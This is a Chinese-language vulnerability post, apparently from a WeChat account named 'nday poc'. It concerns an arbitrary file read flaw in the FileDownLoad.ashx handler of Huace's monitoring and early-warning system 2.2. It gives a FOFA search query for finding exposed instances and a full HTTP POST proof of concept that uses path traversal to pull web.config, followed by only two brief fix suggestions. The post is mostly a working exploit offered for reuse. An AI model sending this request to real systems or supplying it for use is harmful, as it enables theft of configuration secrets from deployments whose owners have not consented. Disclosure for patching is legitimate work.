内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的POC信息及POC对应脚本而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号nday poc及作者不为此承担任何责任,一旦造成后果请自行承担!如文章有侵权烦请及时告知,我们会立即删除文章并致歉。谢谢!
预警系统FileDownLoad.ashx存在任意文件读取漏洞,通过读取配置文件获取重要数据。
FOFA:app="华测监测预警系统2.2"
漏洞复现
Poc:
POST /Handler/FileDownLoad.ashx HTTP/1.1
Host: xxxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
filename=1&filepath=../../web.configBurp数据包
修复建议:
1.输入验证与白名单控制
2.权限控制与安全配置
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
